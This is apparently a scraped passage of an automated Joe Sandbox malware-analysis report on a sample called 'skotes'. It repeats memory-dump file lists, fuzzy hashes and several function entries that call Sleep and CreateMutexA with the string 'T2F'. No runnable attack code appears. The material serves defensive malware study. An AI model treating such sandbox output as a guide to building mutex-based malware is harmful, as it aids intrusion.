Associated: 00000002.00000002.1727239300.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727264025.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727284217.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727299523.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727319522.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727340897.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: 22b0947fabb4a3a94529581d0fce86a2ea2e5dab16747b9c5b86b0b873c1ba9d
Instruction ID: 5f0ff432317c3a327ee694c5638f568aabf596581e6aa4ffe09001cc341cf3c4
Opcode Fuzzy Hash: 22b0947fabb4a3a94529581d0fce86a2ea2e5dab16747b9c5b86b0b873c1ba9d
Instruction Fuzzy Hash: DD3128717002049BEB08DB78DD887ADBB62EBC6324F24862AE014F73D1DB7D5991875A

Function 0040A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724491178.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725120776.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725203580.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725248583.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725272248.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725523316.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725547727.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725781712.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725836564.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725928954.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725946786.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725982656.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726004166.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726035071.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726055406.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726072537.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726231451.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726605042.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726622267.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726641293.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726664742.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726684868.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726704464.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726735071.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726786091.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726908663.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726951137.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726972455.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726995494.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727015082.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727039128.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727061783.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727086829.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727107469.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727127584.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727196829.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727215731.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727239300.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727264025.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727284217.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727299523.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727319522.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727340897.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: 5f9344cec11789cca192c28f86f6784157139bcc4eb51b242fcbcceee41d9756
Instruction ID: cbd0f5ce63b49c9865458caede242b1d5ce73373509101316253218d70173768
Opcode Fuzzy Hash: 5f9344cec11789cca192c28f86f6784157139bcc4eb51b242fcbcceee41d9756
Instruction Fuzzy Hash: 2C3128717003049BEB08DB78CD897ADBB62DBC6324F24862AE014AB3D1CB7D5991865A

Function 0040A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724491178.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725120776.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725203580.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725248583.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725272248.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725523316.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725547727.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725781712.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725836564.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725928954.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725946786.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725982656.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726004166.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726035071.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726055406.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726072537.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726231451.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726605042.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726622267.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726641293.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726664742.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726684868.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726704464.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726735071.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726786091.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726908663.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726951137.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726972455.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726995494.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727015082.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727039128.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727061783.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727086829.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727107469.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727127584.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727196829.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727215731.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727239300.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727264025.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727284217.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727299523.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727319522.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727340897.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: 61f83ef6b940393d17e22b369d8d12dc5b2667a3b6614e264c6031f20c312836
Instruction ID: d5b56192f22cf0495ebc6f2059710d71799737433778b37eed4b51c3284ad0e2
Opcode Fuzzy Hash: 61f83ef6b940393d17e22b369d8d12dc5b2667a3b6614e264c6031f20c312836
Instruction Fuzzy Hash: 103139717002009BEB08DB78DD8979DB7629BC6314F20867EE004BB3D1DB7D5990865A

Function 0040A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724491178.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725120776.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725203580.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725248583.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725272248.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725523316.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725547727.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725781712.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725836564.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725928954.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725946786.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725982656.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726004166.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726035071.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726055406.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726072537.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726231451.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726605042.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726622267.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726641293.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726664742.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726684868.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726704464.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726735071.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726786091.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726908663.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726951137.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726972455.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726995494.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727015082.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727039128.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727061783.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727086829.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727107469.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727127584.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727196829.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727215731.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727239300.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727264025.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727284217.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727299523.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727319522.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727340897.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: baff263b15312c3481f3678bff551089eb828be4c892ab0bcc4bcd8b23ed08be
Instruction ID: dbb65db0bd82d2c99fdf5086e064a362c297f28f60c8d488264207184a2e6f96
Opcode Fuzzy Hash: baff263b15312c3481f3678bff551089eb828be4c892ab0bcc4bcd8b23ed08be
Instruction Fuzzy Hash: 6C313B71B003009BEB08DB78DD897ADB761DFC6314F24862AE014A73D5DBBD5990865A

Function 0040A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724491178.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725120776.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725203580.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725248583.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725272248.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725523316.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725547727.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725781712.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725836564.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725928954.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725946786.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725982656.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726004166.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726035071.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726055406.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726072537.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726231451.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726605042.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726622267.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726641293.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726664742.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726684868.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726704464.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726735071.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726786091.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726908663.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726951137.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726972455.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726995494.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727015082.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727039128.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727061783.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727086829.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727107469.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727127584.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727196829.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727215731.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727239300.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727264025.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727284217.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727299523.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727319522.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727340897.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: 5fc5731705373fcb3f316200402d0b2bfbd9abb1dfa322cca64d24310dd4de94
Instruction ID: 7b540a201d06dfefd400851e32e134081f13f5588af541c60d999fbf1a958258
Opcode Fuzzy Hash: 5fc5731705373fcb3f316200402d0b2bfbd9abb1dfa322cca64d24310dd4de94
Instruction Fuzzy Hash: F3312E717002009BEB08DB78DD8976DB761EFC6328F24862AE014F73D1CB7D9991875A

Function 0040A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724491178.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725120776.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725203580.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725248583.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725272248.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725523316.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725547727.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725781712.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725836564.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725928954.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725946786.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725982656.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726004166.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726035071.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726055406.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726072537.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726231451.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726605042.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726622267.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726641293.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726664742.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726684868.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726704464.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726735071.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726786091.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726908663.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726951137.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726972455.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726995494.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727015082.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727039128.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727061783.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727086829.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727107469.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727127584.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727196829.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727215731.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727239300.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727264025.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727284217.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
